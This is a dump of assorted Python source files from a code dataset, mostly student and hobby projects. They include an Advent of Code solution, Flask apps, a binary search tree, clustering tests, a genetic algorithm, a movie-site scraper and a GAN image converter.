_BUY\n\t\t\n\t\t# Action smoothing\n\t\tprevAction = actionVec[0]\n\t\tfor t in range(1, dataLen):\n\t\t\tif actionVec[t] == prevAction:\n\t\t\t\tactionVec[t] = _HOLD\n\t\t\telif actionVec[t] == -prevAction:\n\t\t\t\tprevAction = actionVec[t]\n\n\t\treturn actionVec\n\n\t# Baseline method\n\telse:\n\t\tconCount = 3\n\t\tfor ic in range(dataLen):\n\t\t\tif ic + conCount + 1 > dataLen:\n\t\t\t\tcontinue\n\t\t\tif all(x > 0 for x in list(map(operator.sub,priceVec[ic+1:ic+1+conCount], priceVec[ic:ic+conCount]))):\n\t\t\t\tactionVec[ic] = _BUY\n\t\t\tif all(x < 0 for x in list(map(operator.sub,priceVec[ic+1:ic+1+conCount], priceVec[ic:ic+conCount]))):\n\t\t\t\tactionVec[ic] = _SELL\n\t\tprevAction = _SELL\n\n\t\tfor ic in range(dataLen):\n\t\t\tif actionVec[ic] == prevAction:\n\t\t\t\tactionVec[ic] = _HOLD\n\t\t\telif actionVec[ic] == -prevAction:\n\t\t\t\tprevAction = actionVec[ic]\n\t\treturn actionVec","sub_path":"HW3/myOptimActionOne.py","file_name":"myOptimActionOne.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"475207983","text":"import pickle\nimport pandas as pd\nimport argparse\nfrom init_loader import init, settings\n\n\ndef convert(path):\n #using pandas with a column specification\n col_specification =[(0, 7), (8, 38), (39, 40), (41,50), (51,60), (61,91), (93,94), (94,100),(100, 101), (101,107), (108,109), (109,110), (110,116), (116,117), (117,123), (124,136), (136,137), (138,139), (139,155), (155,158)]\n data = pd.read_fwf(path, colspecs=col_specification, names=('OID', 'Name','V','RAdeg', 'DEdeg', 'Type', 'l_max', 'max', 'u_max', 'n_max', 'f_min', 'l_min', 'min', 'u_min', 'n_min', 'Epoch', 'u_Epoch', 'l_Period', 'Period', 'u_Period'), converters={'l_max': str})\n\n ra_deg_np = data['RAdeg'].as_matrix()\n dec_deg_np = data['DEdeg'].as_matrix()\n metadata = []\n for index, row in data.iterrows():\n metadata.append({'id': index, 'OID': row['OID'], 'Name': row['Name'], 'Type': row['Type'], 'l_Period': row['l_Period'], 'Period': row['Period'], 'u_Period': row['u_Period']})\n vsx_dict = { 'ra_deg_np': ra_deg_np, 'dec_deg_np': dec_deg_np, 'metadata': metadata}\n\n # From Python 3.6 onwards, the standard dict type maintains insertion order by default. => no OrderedDict necessary\n with open(settings.vsxcatalogdir, 'wb') as fp:\n pickle.dump(vsx_dict, fp)\n\n# returns: { 'ra_deg_np': ra_deg_np, 'dec_deg_np': dec_deg_np, 'metadata': ({'id': index, 'OID': row['OID'], 'Name': row['Name'], 'Type': row['Type'], 'l_Period': row['l_Period'], 'Period': row['Period'], 'u_Period': row['u_Period']})}\ndef read(path):\n with open(path, 'rb') as fp:\n read_dict = pickle.load(fp, encoding='latin1')\n return read_dict\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Converting vsx to pickle file vsx.bin')\n parser.add_argument('vsx_path')\n args = parser.parse_args()\n convert(args.vsx_path)\n","sub_path":"src/vsx_pickle.py","file_name":"vsx_pickle.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"47437342","text":"\"\"\"\nAUTHOR: M. Montgomery \nDATE: 12/08/2018\nFILE: day07.py \n\nPROMPT: \n--- Day 7: The Sum of Its Parts ---\n\nYou find yourself standing on a snow-covered coastline; apparently, you landed a little off course. The region is too hilly to see the North Pole from here, but you do spot some Elves that seem to be trying to unpack something that washed ashore. It's quite cold out, so you decide to risk creating a paradox by asking them for directions.\n\n\"Oh, are you the search party?\" Somehow, you can understand whatever Elves from the year 1018 speak; you assume it's Ancient Nordic Elvish. Could the device on your wrist also be a translator? \"Those clothes don't look very warm; take this.\" They hand you a heavy coat.\n\n\"We do need to find our way back to the North Pole, but we have higher priorities at the moment. You see, believe it or not, this box contains something that will solve all of Santa's transportation problems - at least, that's what it looks like from the pictures in the instructions.\" It doesn't seem like they can read whatever language it's in, but you can: \"Sleigh kit. Some assembly required.\"\n\n\"'Sleigh'? What a wonderful name! You must help us assemble this 'sleigh' at once!\" They start excitedly pulling more parts out of the box.\n\nThe instructions specify a series of steps and requirements about which steps must be finished before others can begin (your puzzle input). Each step is designated by a single letter. For example, suppose you have the following instructions:\n\nStep C must be finished before step A can begin.\nStep C must be finished before step F can begin.\nStep A must be finished before step B can begin.\nStep A must be finished before step D can begin.\nStep B must be finished before step E can begin.\nStep D must be finished before step E can begin.\nStep F must be finished before step E can begin.\n\nVisually, these requirements look like this:\n\n\n -->A--->B--\n / \\ \\\nC -->D----->E\n \\ /\n ---->F-----\n\nYour first goal is to determine the order in which the steps should be completed. If more than one step is ready, choose the step which is first alphabetically. In this example, the steps would be completed as follows:\n\nOnly C is available, and so it is done first. Next, both A and F are available. A is first alphabetically, so it is done next. Then, even though F was available earlier, steps B and D are now also available, and B is the first alphabetically of the three. After that, only D and F are available. E is not available because only some of its prerequisites are complete. Therefore, D is completed next. F is the only choice, so it is done next. Finally, E is completed.\n\nSo, in this example, the correct order is CABDFE. In what order should the steps in your instructions be completed?\n\n--- Part Two ---\n\nAs you're about to begin construction, four of the Elves offer to help. \"The sun will set soon; it'll go faster if we work together.\" Now, you need to account for multiple people working on steps simultaneously. If multiple steps are available, workers should still begin them in alphabetical order.\n\nEach step takes 60 seconds plus an amount corresponding to its letter: A=1, B=2, C=3, and so on. So, step A takes 60+1=61 seconds, while step Z takes 60+26=86 seconds. No time is required between steps.\n\nTo simplify things for the example, however, suppose you only have help from one Elf (a total of two workers) and that each step takes 60 fewer seconds (so that step A takes 1 second and step Z takes 26 seconds). Then, using the same instructions as above, this is how each second would be spent:\n\nSecond Worker 1 Worker 2 Done\n 0 C . \n 1 C . \n 2 C . \n 3 A F C\n 4 B F CA\n 5 B F CA\n 6 D F CAB\n 7 D F CAB\n 8 D F CAB\n 9 D . CABF\n 10 E . CABFD\n 11 E . CABFD\n 12 E . CABFD\n 13 E . CABFD\n 14 E . CABFD\n 15 . . CABFDE\n\nEach row represents one second of time. The Second column identifies how many seconds have passed as of the beginning of that second. Each worker column shows the step that worker is currently doing (or . if they are idle). The Done column shows completed steps.\n\nNote that the order of the steps has changed; this is because steps now take time to finish and multiple workers can begin multiple steps simultaneously. In this example, it would take 15 seconds for two workers to complete these steps.\n\nWith 5 workers and the 60+ second step durations described above, how long will it take to complete all of the steps?\n\"\"\"\n\nimport sys, re, copy\n\n\ndef extractPairs(instructions):\n\n Rpair = re.compile(\"Step (\\w) must be finished before step (\\w) can begin.\")\n \n pairs = []\n for line in instructions:\n data = Rpair.search(line)\n if data:\n pairs.append((data.group(1), data.group(2)))\n return pairs\n\n\ndef makeDependencies(IDs, pairs):\n\n dependencies = {}\n for ID in IDs:\n dependencies[ID] = []\n for A, B in pairs:\n dependencies[A] += [B]\n return dependencies\n\n\ndef determineOrder(IDs, dependencies):\n\n queue = []\n order = []\n\n # until every step is in the order\n while len(order) != len(IDs):\n\n # evaluate each remaining step\n for step in dependencies:\n if step in queue or step in order:\n continue\n\n # check if still dependent on another step\n available = True\n for other in dependencies:\n if step in dependencies[other]:\n available = False\n\n if available:\n queue.append(step)\n\n # add first step in sorted queue to order\n queue.sort()\n order.append(queue[0])\n\n # release step's dependents\n del dependencies[queue.pop(0)]\n\n return ''.join(order)\n \n\ndef determineTimedOrder(IDs, dependencies):\n\n queue = []\n order = []\n inProgress = []\n\n # set up for timing tasks\n timings = {}\n for ID in IDs:\n timings[ID] = ord(ID) - 4 # ord 'A' is 65; needs to be 61\n time = 0\n NWORKERS = 5\n\n # until every step is in the order\n while len(order) != len(IDs):\n\n # evaluate each remaining step\n for step in dependencies:\n if step in queue or step in inProgress:\n continue\n\n # check if still dependent on another step\n available = True\n for other in dependencies:\n if step in dependencies[other]:\n available = False\n\n if available:\n queue.append(step)\n\n # move steps from sorted queue to in-progress\n queue.sort()\n while len(inProgress) < NWORKERS and len(queue) > 0:\n inProgress.append(queue.pop(0))\n\n # work on each available step\n working = min(NWORKERS, len(inProgress))\n for i in range(working-1, -1, -1):\n\n # reduce time remaining by 1\n step = inProgress[i]\n timings[step] -= 1\n\n # completed a step\n if timings[step] == 0:\n\n # move step from in-progress to order\n order.append(step)\n inProgress.pop(i)\n\n # release step's dependents\n del dependencies[step]\n\n time += 1\n\n return ''.join(order), time\n\n\ndef main():\n\n # get input\n lines = [line.strip() for line in sys.stdin.readlines()]\n pairs = extractPairs(lines)\n IDs = set()\n for A, B in pairs:\n IDs.add(A)\n IDs.add(B)\n dependencies = makeDependencies(IDs, pairs)\n\n # PART ONE\n order = determineOrder(IDs, copy.deepcopy(dependencies))\n print(\"Order: \", order)\n\n # PART TWO\n order, time = determineTimedOrder(IDs, dependencies)\n print(\"New order:\", order, \"(\", time, \"seconds )\")\n\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"484655394","text":"from flask import Flask\napp = Flask(__name__)\n\ncount = 0\n\n@app.route('/')\ndef index():\n\tglobal count\n\tcount += 1\n\t\n\treturn 'Hello from application' + str(count)\n\nif __name__ == '__main__':\n\tapp.run(host='0.0.0.0')\n","sub_path":"app_example/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"629711678","text":"import pandas as pd\r\nimport itertools\r\nfrom itertools import permutations\r\n\r\n\r\ndef Ways(N):\r\n a = list(itertools.product([1, 2], repeat=N - 1))\r\n df = pd.DataFrame(a)\r\n df[\"sum\"] = df.sum(axis=1)\r\n new = df.loc[df['sum'] == N - 1]\r\n return len(new)\r\ndef findJumpingWays(N):\r\n count = 0\r\n for i in range(1,N):\r\n Ways(i)\r\n count= count + Ways(i)\r\n return count\r\n\r\nfindJumpingWays(3)","sub_path":"question1.py","file_name":"question1.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"479471316","text":"import pytest\nimport numpy as np\nimport clusters.algs as algs\n\ndef test_hierarchical():\n\t# Setup\n thresh = 0.42\n \n x_input_hc = np.array([[0., 0., 1., 0., 0.],\n [1., 0., 0., 0., 0.],\n [0., 1., 0., 1., 1.],\n [0., 1., 0., 0., 0.],\n [0., 0., 0., 1., 0.]])\n \n desired_p_lab_hc = np.array([0, 1, 2, 2, 2])\n\n # Exercise\n HC = algs.HierarchicalClustering(x_input_hc, thresh)\n p_lab_hc = HC.cluster()\n\n # Verify\n np.testing.assert_array_equal(p_lab_hc, desired_p_lab_hc)\n\n\ndef test_partitioning():\n # Setup\n n_clusters = 1\n \n x_input_km = np.array([[0., 0., 1., 0., 0.],\n [1., 0., 0., 0., 0.],\n [0., 1., 0., 1., 1.],\n [0., 1., 0., 0., 0.],\n [0., 0., 0., 1., 0.]])\n \n desired_p_lab_km = np.array([0, 0, 0, 0, 0])\n\n # Exercise\n kmodes = algs.PartitionClustering(x_input_km, n_clusters)\n c, c_lab, p_lab_km = kmodes.cluster()\n \n\n # Verify\n np.testing.assert_array_equal(p_lab_km, desired_p_lab_km)","sub_path":"test/test_clusters.py","file_name":"test_clusters.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"534647606","text":"from graphviz import Digraph\n\n\nclass TreeNode:\n def __init__(self, node):\n self.node = node\n self.child_left = None\n self.child_right = None\n\n # set the left child of current node\n def set_child_left(self, node):\n self.child_left = TreeNode(node)\n\n # set the right child of current node\n def set_child_right(self, node):\n self.child_right = TreeNode(node)\n\n # returns recursively all childs beginning from the current node as string\n def print_childs(self):\n if self.child_left is None and self.child_right is None:\n return f\"{self.node}\"\n elif self.child_left is not None and self.child_right is None:\n return f\"{self.node}(L_{self.child_left.print_childs()})\"\n elif self.child_left is None and self.child_right is not None:\n return f\"{self.node}(R_{self.child_right.print_childs()})\"\n elif self.child_left is not None and self.child_right is not None:\n return f\"{self.node}(L_{self.child_left.print_childs()}, R_{self.child_right.print_childs()})\"\n\n\nclass BinarySearchTree:\n def __init__(self, root):\n self.root = TreeNode(root)\n self.dot = None\n self.node_count = 1\n\n # insert a new node into the BST\n def insert_node(self, node):\n recent_node = self.root\n place_found = False\n while not place_found:\n if node < recent_node.node:\n if recent_node.child_left is None:\n recent_node.set_child_left(node)\n place_found = True\n self.node_count += 1\n else:\n recent_node = recent_node.child_left\n elif node > recent_node.node:\n if recent_node.child_right is None:\n recent_node.set_child_right(node)\n place_found = True\n self.node_count += 1\n else:\n recent_node = recent_node.child_right\n\n # print the whole BST\n def print_tree(self):\n print(self.root.print_childs())\n\n # search node in BST\n # returns if found and amount of comparisons needed\n def search_node(self, node):\n compare_count = 0\n recent_node = self.root\n while recent_node is not None:\n if node < recent_node.node:\n compare_count += 1\n if recent_node.child_left is None:\n return False, compare_count\n else:\n recent_node = recent_node.child_left\n elif node > recent_node.node:\n compare_count += 1\n if recent_node.child_right is None:\n return False, compare_count\n else:\n recent_node = recent_node.child_right\n else:\n compare_count += 1\n return True, compare_count\n\n # print if found node in BST and how many comparisons needed\n def search_node_print(self, node):\n in_tree, steps_tree = self.search_node(node)\n if in_tree:\n print(f\"{node} in Tree ({steps_tree} nodes compared)\")\n else:\n print(f\"{node} not in Tree ({steps_tree} nodes compared)\")\n\n # important helper method to render the BST with graphviz\n def gen_graph_node(self, graph_node):\n if graph_node.child_left is not None:\n self.dot.node(str(graph_node.child_left.node), str(graph_node.child_left.node))\n self.dot.edge(str(graph_node.node), str(graph_node.child_left.node))\n self.gen_graph_node(graph_node.child_left)\n else:\n self.dot.node(str(graph_node.node) + \"LNone\", \"\")\n self.dot.edge(str(graph_node.node), str(graph_node.node) + \"LNone\")\n if graph_node.child_right is not None:\n self.dot.node(str(graph_node.child_right.node), str(graph_node.child_right.node))\n self.dot.edge(str(graph_node.node), str(graph_node.child_right.node))\n self.gen_graph_node(graph_node.child_right)\n else:\n self.dot.node(str(graph_node.node) + \"RNone\", \"\")\n self.dot.edge(str(graph_node.node), str(graph_node.node) + \"RNone\")\n\n # generate png image of the BST\n def gen_graph_tree(self):\n self.dot = Digraph(format='png')\n self.dot.node(str(self.root.node), str(self.root.node))\n self.gen_graph_node(self.root)\n self.dot.render(\"BST\", \"images\")\n del self.dot\n\n\nif __name__ == '__main__':\n B = BinarySearchTree(8)\n B.insert_node(3)\n B.insert_node(2)\n B.insert_node(10)\n B.insert_node(5)\n B.insert_node(4)\n B.insert_node(7)\n B.insert_node(12)\n B.insert_node(11)\n B.print_tree()\n B.search_node_print(4)\n B.search_node_print(11)\n B.gen_graph_tree()\n","sub_path":"datastructures/bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"507903167","text":"# a list digits\nlist_of_digits= [0,1,2,3,4,5,6]\n# take input from user\ninput_digit= int(input(\"Enter a digit: \"))\n# search the input digit in our list\nfor i in list_of_digits:\n if input_digit== i:\n print(\"Digit is in the list\")\n break\n else:\n print(\"Digit not found in list\")","sub_path":"Python_codes/DemoForElse.py","file_name":"DemoForElse.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"79285127","text":"# web server and application for annotation\n\nfrom flask import Flask, render_template, redirect, url_for\nimport requests\nimport json\nimport os\n\napp = Flask(__name__)\n\nport = 80\n\n@app.route('/annotate')\ndef annotate():\n img = \"00200.jpg\"\n return render_template(\"index.html\", image=img)\n\n\n@app.route('/hello')\n@app.route('/hello/')\ndef hello(name=None):\n return render_template(\"index.html\", name=name)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=port)","sub_path":"scripts/annotation/annotate.py","file_name":"annotate.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"188720017","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('xx_mgr', '0012_mgrimage_style'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='mgrtag',\n name='show_mobile',\n field=models.IntegerField(default=1, verbose_name='\\u662f\\u5426\\u79fb\\u52a8\\u7aef\\u663e\\u793a', choices=[(0, '\\u9690\\u85cf'), (1, '\\u663e\\u793a')]),\n ),\n ]\n","sub_path":"xx_mgr/migrations/0013_mgrtag_show_mobile.py","file_name":"0013_mgrtag_show_mobile.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"414039945","text":"from GeneticAlgorithmComponents.crossovers.crossoverwithonecutoffpoint import CrossoverWithOneCutoffPoint\nfrom GeneticAlgorithmComponents.mutations.bitflip import BipFlip\nfrom GeneticAlgorithmComponents.selections.roulette import Roulette\nfrom GeneticAlgorithmComponents.selections.tournament import Tournament\nfrom MarcoAntonioGomesRastrigin.rastrigin_ga import RastriginGa\n\n\ndef marco_antonio(nvar, ncal):\n population_size = 100\n maximum_number_of_generations = ncal / population_size\n crossover_probability = 0.80\n mutation_probability = 0.3\n mutation = BipFlip()\n crossover = CrossoverWithOneCutoffPoint()\n selection_1 = Tournament(10)\n selection_2 = Roulette(10)\n precison = (10 ** (-3))\n xmin = -5.12\n xmax = 5.12\n c_max = 0\n\n rastrigin_ga = RastriginGa(population_size,\n maximum_number_of_generations,\n crossover_probability,\n mutation_probability,\n mutation,\n crossover,\n selection_1,\n nvar,\n precison,\n xmin,\n xmax,\n selection_2, c_max)\n\n rastrigin_ga.init_population()\n rastrigin_ga.run_ga()\n the_best_subject = rastrigin_ga.select_the_best_subject()\n print(\"X*: \", the_best_subject.binary_string)\n print(\"F*: \", the_best_subject.fitness - c_max)\n\n\nif __name__ == '__main__':\n marco_antonio(10, 10000)\n","sub_path":"MarcoAntonioGomesRastrigin/marco_antonio_gomes_rastrigin.py","file_name":"marco_antonio_gomes_rastrigin.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"163231073","text":"import requests\nfrom bs4 import BeautifulSoup\nimport lxml.etree\nimport scrapy\nfrom spider1.items import Spider1Item\n\n\n\nclass MaoyanSpider(scrapy.Spider):\n name = 'maoyan'\n allowed_domains = ['maoyan.com']\n start_urls = ['https://maoyan.com']\n\n def start_requests(self):\n user_agent = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36'\n headers = {}\n headers['user-agent'] = user_agent\n myurl1 = 'https://maoyan.com/board'\n response1 = requests.get(myurl1, headers=headers)\n response1.encoding='utf-8'\n soup = BeautifulSoup(response1.text, 'html.parser')\n title_list = soup.find_all('p', attrs={'class': 'name'})\n for i in range(len(title_list)):\n link = ('https://maoyan.com'+title_list[i].find('a').get('href'))\n yield scrapy.Request(url=link, callback=self.parse)\n\n def parse(self, response):\n items = []\n item = Spider1Item()\n selector = lxml.etree.HTML(response.text)\n film_name = selector.xpath('/html/body/div[3]/div/div[2]/div[1]/div/text()')\n film_type = selector.xpath('/html/body/div[3]/div/div[2]/div[1]/ul/li[1]/a[1]/text()')\n plan_date = selector.xpath('/html/body/div[3]/div/div[2]/div[1]/ul/li[3]/text()')\n \n item['title'] = film_name\n item['link'] = film_type\n item['time'] = plan_date\n \n items.append(item)\n return items","sub_path":"week01/spider1/spider1/spiders/maoyan.py","file_name":"maoyan.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"36006284","text":"import os\nimport logging\nimport pickle\nimport torch, torch.nn as nn, torch.optim as optim\nimport torchvision.transforms as xforms, torchvision.datasets, torchvision.utils\nfrom PIL import Image\nimport PIL\nfrom torchvision.utils import save_image\nfrom torchvision import datasets, models, transforms\nfrom flask import send_from_directory\nfrom flask import Flask, render_template, request, redirect\nfrom flask_dropzone import Dropzone\n\nbasedir = os.path.abspath(os.path.dirname(__file__))\napp = Flask(__name__)\n\nclass Generator(nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n # got rid of vgg layers, changed kernal size to 4x4\n self.conv_layers = nn.Sequential(\n nn.Conv2d(3, 64, 4, 1, 1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(64),\n nn.Conv2d(64, 128, 4, 1, 1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(128),\n nn.Conv2d(128, 256, 4, 1, 1),\n nn.LeakyReLU(),\n nn.BatchNorm2d(256)\n )\n\n # 9 resnet blocks\n self.resnet_layers = nn.Sequential(\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n BasicBlock(256, 256),\n )\n\n # the 3 transposed convolution layers\n self.tconv_layers = nn.Sequential(\n nn.ConvTranspose2d(256, 128, 4, 1, 1),\n nn.BatchNorm2d(128),\n nn.LeakyReLU(),\n\n nn.ConvTranspose2d(128, 64, 4, 1, 1),\n nn.BatchNorm2d(64),\n nn.LeakyReLU(),\n\n nn.ConvTranspose2d(64, 3, 4, 1, 1),\n nn.LeakyReLU(),\n nn.Tanh()\n )\n\n def init_layer(layer):\n if type(layer).__name__[:4] == 'Conv':\n nn.init.xavier_uniform_(layer.weight)\n elif layer.__class__.__name__[:9] == 'BatchNorm':\n nn.init.normal_(layer.weight, 1.0, 0.02)\n nn.init.constant_(layer.bias, 0.0)\n elif type(layer).__name__[:5] == \"Basic\":\n nn.init.xavier_uniform_(layer.conv1.weight)\n nn.init.xavier_uniform_(layer.conv2.weight)\n \n\n\n self.tconv_layers.apply(init_layer)\n self.resnet_layers.apply(init_layer)\n self.conv_layers.apply(init_layer)\n\n \n def forward(self, samples):\n # pass sample through all the layers\n out = self.conv_layers(samples)\n out = self.resnet_layers(out)\n out = self.tconv_layers(out)\n return out\n\nmodel = pickle.load(open(os.path.join(basedir,'model.pkl'), 'rb'))\n\napp.config.update(\n UPLOADED_PATH= os.path.join(basedir,'uploads'),\n RESULT_PATH= os.path.join(basedir,'results'),\n IMAGES_PATH= os.path.join(basedir,'images'),\n DROPZONE_MAX_FILE_SIZE = 1024,\n DROPZONE_ALLOWED_FILE_CUSTOM = True,\n DROPZONE_ALLOWED_FILE_TYPE = 'image/*',\n DROPZONE_DEFAULT_MESSAGE = \"\",\n DROPZONE_INVALID_FILE_TYPE = \"Please upload a photo\",\n DROPZONE_MAX_FILES = 1,\n DROPZONE_MAX_FILE_EXCEED = \"\",\n DROPZONE_TIMEOUT = 5*60*1000,\n SEND_FILE_MAX_AGE_DEFAULT = 1)\n\ndropzone = Dropzone(app)\n\n# -------------------------------------------- Viewable Pages -------------------------------------------- #\n\n# Home page\n@app.route('/',methods=['POST','GET']) \ndef upload():\n if request.method == 'POST':\n deletefile()\n f = request.files.get('file')\n f.save(os.path.join(app.config['UPLOADED_PATH'], \"upload.jpg\"))\n return render_template('WaterColourConverter.html')\n\n# Result page \n@app.route('/results/')\ndef resultPage():\n device = 'cpu'\n # transforms needed to pass the image through the model. Can change 128, 128 to another number to resize as needed\n \n tr = xform_none = torchvision.transforms.Compose([torchvision.transforms.ToTensor(), torchvision.transforms.Resize((400,400)), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n MEAN = torch.tensor([0.5, 0.5, 0.5])\n STD = torch.tensor([0.5, 0.5, 0.5])\n img = tr(Image.open(os.path.join(app.config['UPLOADED_PATH'], \"upload.jpg\"))).unsqueeze(0).to(device)\n # gen is the tensor with the transformed image\n \n gen = model(img).cpu() * STD[:, None, None] + MEAN[:, None, None]\n save_image(gen, os.path.join(app.config['RESULT_PATH'], \"result.jpg\"))\n return render_template('index.html')\n\n\n# -------------------------------------------- Pages for image management ------------------------------ #\n\n# Used to return final result image\n@app.route('/resultImage/', methods=['GET', 'POST'])\ndef download():\n return send_from_directory(app.config['RESULT_PATH'], filename=os.listdir(app.config['RESULT_PATH'])[0])\n\n# Used to return images for webpage so frontend can display any image stored on the server\n@app.route('/uploads/', methods=['GET', 'POST'])\ndef displayImage(filename):\n return send_from_directory(directory=app.config['IMAGES_PATH'], filename=filename)\n \n# Delete all uploaded and result files and reroutes to main page\n@app.route('/deleteUploads', methods=['GET', 'POST'])\ndef deletefile():\n\n for filename in os.listdir(app.config['UPLOADED_PATH']):\n file_path = os.path.join(app.config['UPLOADED_PATH'], filename)\n os.remove(file_path)\n \n for filename in os.listdir(app.config['RESULT_PATH']):\n file_path = os.path.join(app.config['RESULT_PATH'], filename)\n os.remove(file_path)\n\n return redirect(\"/\")\n\n@app.after_request\ndef add_header(response):\n response.cache_control.no_store = True\n if 'Cache-Control' not in response.headers:\n response.headers['Cache-Control'] = 'no-store'\n return response\n\nif __name__ == \"__main__\":\n app.run(debug=True)","sub_path":"backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"479884691","text":"\"\"\"\n1. Проанализировать скорость и сложность одного любого алгоритма,\nразработанных в рамках домашнего задания первых трех уроков.\nПримечание: попробуйте написать несколько реализаций алгоритма и сравнить их.\n\"\"\"\n\nfrom random import randint\nfrom random import shuffle\nfrom timeit import Timer\n\n\ndef change_places_min_max():\n \"\"\"\n Функция меняет местами минимальный и\n максимальный элементы в массиве\n :return: Массив\n \"\"\"\n\n my_list = list(set(randint(0, 30) for i in range(30)))\n # определим переменные, минимальному зададим максимальное значение,\n # а максимальному минимальное\n MIN_EL = 30\n MAX_EL = 0\n MIN_EL_KEY = 0\n MAX_EL_KEY = 0\n\n # перемешаем \"массив\", чтобы было интереснее\n shuffle(my_list)\n for key, value in enumerate(my_list):\n\n # поиск максимального и минимального\n # элементов и запоминаем их индексы\n # min() и max() неинтересны\n if value > MAX_EL:\n MAX_EL = value\n MAX_EL_KEY = key\n elif value < MIN_EL:\n MIN_EL = value\n MIN_EL_KEY = key\n\n # при случае, когда переменная MAX_EL равна максимальному значению\n # а MIN_EL минимальному - прекращаем поиск\n if MAX_EL == 30 and MIN_EL == 0:\n break\n # переставляем местами минимальное и максимальное значение\n my_list[MIN_EL_KEY], my_list[MAX_EL_KEY] = my_list[MAX_EL_KEY], my_list[MIN_EL_KEY]\n return my_list\n\n\nt1 = Timer(\"change_places_min_max()\", setup=\"from __main__ import change_places_min_max\")\nprint('change_places_min_max', t1.timeit(number=1000), 'milliseconds')\n\n\ndef change_places_min_max_two():\n \"\"\"\n Функция меняет местами минимальный и\n максимальный элементы в массиве\n :return: Массив\n \"\"\"\n\n my_list = list(set(randint(0, 30) for i in range(30)))\n # определим переменные, минимальному зададим максимальное значение,\n # а максимальному минимальное\n\n MIN_EL = min(my_list)\n MAX_EL = max(my_list)\n\n shuffle(my_list)\n\n MIN_EL_KEY = my_list.index(MIN_EL)\n MAX_EL_KEY = my_list.index(MAX_EL)\n\n # переставляем местами минимальное и максимальное значение\n my_list[MIN_EL_KEY], my_list[MAX_EL_KEY] = my_list[MAX_EL_KEY], my_list[MIN_EL_KEY]\n return my_list\n\n\nt2 = Timer(\"change_places_min_max_two()\", setup=\"from __main__ import change_places_min_max_two\")\nprint('change_places_min_max_two', t2.timeit(number=1000), 'milliseconds')\n\n# Сложность похожа на линейную\n# timeit на первую реализацию выдает результат change_places_min_max 0.07574980199933634 milliseconds\n# timeit на вторую реализацию выдает результат change_places_min_max_two 0.07802550199994585 milliseconds\n# Разница не в пользу стандартных функций, скорее всего\n# из-за двойного поиска, т.е. сперва ищем элемент, а потом еще и индекс\n","sub_path":"Lesson_4/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"622533800","text":"import requests\n\nclass Gold(object):\n def __init__(self):\n self.headers = {\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Referer': 'http://www.wikipedia.org/',\n 'Connection': 'keep-alive'}\n self.url = \" https://data-asg.goldprice.org/dbXRates/USD\"\n\n @property\n def get(self):\n try:\n r = requests.get(url=self.url, headers= self.headers, timeout=1)\n if r.ok:\n return r\n else:\n return None\n except requests.exceptions.Timeout:\n return 'Bad Response'\n","sub_path":"Demo/Third/gold.py","file_name":"gold.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"592037371","text":"\n# coding: utf-8\n\n# In[1]:\n\nfrom bs4 import BeautifulSoup\nfrom bs4 import NavigableString\nimport re\nimport string\nimport nltk.tree\nimport nltk.tokenize\nimport nltk.corpus\nfrom nltk.corpus import sentiwordnet as swn\nfrom nltk.corpus import wordnet as wn\nfrom nltk.tokenize import 